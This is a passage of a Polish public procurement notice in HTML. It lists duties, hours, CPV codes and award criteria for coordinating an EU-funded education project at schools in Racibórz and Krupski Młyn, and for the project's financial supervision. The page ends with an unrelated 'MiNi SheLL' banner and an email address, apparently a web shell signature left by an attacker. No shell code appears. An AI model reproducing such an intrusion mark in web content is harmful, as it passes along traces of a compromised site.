Bierze udział w spotkaniach kadry zarządzającej; 
Przygotowuje dane do części opisowej wniosku o płatność dotyczącej zadań projektu;
Informuje kierownika projektu o wszelkich nieprawidłowościach związanych z realizacją projektu;
Pełni nadzór nad terminowym wypełnianiem dzienników, ewidencji czasu pracy, list obecności na zajęciach oraz innej niezbędnej dokumentacji Projektu w placówce; 
Monitoruje postępy ewaluacyjne;
Przestrzega i nadzoruje przetwarzanie danych osobowych w projekcie, zgodnie z obowiązującymi przepisami;
Monitoruje właściwe użytkowanie pomocy dydaktycznych oraz dokonuje ich oznaczenia logotypami..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.11.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Koordynacja Projektem w Zespole Szkół Ogólnokształcących Mistrzostwa Sportowego  w Raciborzu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa koordynowania działań projektowych w ZSOMS w Raciborzu  - w zakresie przewidzianym do realizacji przez Lidera Projektu oraz Partnerów. Przewidywana liczba godzin na realizację zadania:  53 godz. w mies. x 16 mies.  tj.  848 godz.
Koordynator Projektu w ZSOMS: 
Podlega Kierownikowi projektu;
Bierze udział w procesie rekrutacji i pracach komisji rekrutacyjnej; 
Opracowuje formularze rekrutacyjne;
Prowadzi sprawy administracyjno - biurowe związane z obsługą Projektu w ZSOMS;
Sprawuje nadzór pedagogiczny nad kadrą pedagogiczną zatrudnioną w placówce w ramach Projektu;
Monitoruje realizację wytyczonych celów projektu raz na kwartał;
Podejmuje niezbędne działania mające na celu osiągnięcie wskaźników rezultatu projektu;
Aktualizuje dokumenty w związku ze zmianami w projekcie;
Bierze udział w spotkaniach kadry zarządzającej; 
Przygotowuje dane do części opisowej wniosku o płatność dotyczącej zadań projektu;
Informuje kierownika projektu o wszelkich nieprawidłowościach związanych z realizacją projektu;
Pełni nadzór nad terminowym wypełnianiem dzienników, ewidencji czasu pracy, list obecności na zajęciach oraz innej niezbędnej dokumentacji Projektu w placówce; 
Monitoruje postępy ewaluacyjne;
Przestrzega i nadzoruje przetwarzanie danych osobowych w projekcie, zgodnie z obowiązującymi przepisami;
Monitoruje właściwe użytkowanie pomocy dydaktycznych oraz dokonuje ich oznaczenia logotypami..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.11.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Koordynacja Projektem w Młodzieżowym Ośrodku Wychowawczym w Krupskim Młynie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa koordynowania działań projektowych w MOW w Krupskim Młynie- w zakresie przewidzianym do realizacji przez Lidera Projektu oraz Partnerów. Przewidywana liczba godzin na realizację zadania:  53 godz./mies. x 16 mies.  tj.  848 godz.
Koordynator Projektu w MOW: 
Koordynuje działania w ramach Projektu w Młodzieżowym Ośrodku Wychowawczym w Krupskim Młynie, przy ul. Krasickiego 4;
Podlega Kierownikowi projektu;
Bierze udział w procesie rekrutacji i pracach komisji rekrutacyjnej; 
Opracowuje formularze rekrutacyjne;
Prowadzi sprawy administracyjno - biurowe związane z obsługą Projektu w MOW;
Sprawuje nadzór pedagogiczny nad kadrą pedagogiczną zatrudnioną w placówce w ramach Projektu;
Monitoruje realizację wytyczonych celów projektu raz na kwartał;
Podejmuje niezbędne działania mające na celu osiągnięcie wskaźników rezultatu projektu;
Aktualizuje dokumenty w związku ze zmianami w projekcie;
Bierze udział w spotkaniach kadry zarządzającej; 
Przygotowuje dane do części opisowej wniosku o płatność dotyczącej zadań projektu;
Informuje kierownika projektu o wszelkich nieprawidłowościach związanych z realizacją projektu;
Pełni nadzór nad terminowym wypełnianiem dzienników, ewidencji czasu pracy, list obecności na zajęciach oraz innej niezbędnej dokumentacji Projektu w placówce; 
Monitoruje postępy ewaluacyjne;
Przestrzega i nadzoruje przetwarzanie danych osobowych w projekcie, zgodnie z obowiązującymi przepisami;
Monitoruje właściwe użytkowanie pomocy dydaktycznych oraz dokonuje ich oznaczenia logotypami..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.11.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Nadzór finansowy i rozliczanie budżetu Projektu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa sprawowania nadzoru finansowego i rozliczania budżetu projektu, prowadzenia rachunkowości, przy ścisłej współpracy z komórkami finansowymi Lidera i Partnerów Projektu. Przewidywana liczba godzin na realizację zadania:  56 godz. w mies. x 16 mies.  tj. 896 godz.
Specjalista ds. finansowych: Odpowiada za prowadzenie finansów projektu;
Podlega Kierownikowi projektu;
Prowadzi pełną rachunkowość projektu (program księgowy Vulkan - finanse Optvum);
Monitoruje przepływy finansowe i realizację zakupów zgodnie z planem finansowym;
Przygotowuje wnioski o płatność w części finansowej;
Dokonuje rozliczeń finansowych przez wydzielone subkonto bankowe SOSWNiS;
Współpracuje z kierownikiem projektu, główną księgową SOSWNiS, oraz pozostałą kadrą zarządzającą;
Bierze udział w spotkaniach kadry zarządzającej projektu, 
Informuje kierownika projektu o wszelkich nieprawidłowościach związanych z realizacją finansową projektu; 
Podejmuje działania zgodne z wytycznymi krajowymi oraz UE co do realizacji finansowej projektu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.21.10.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com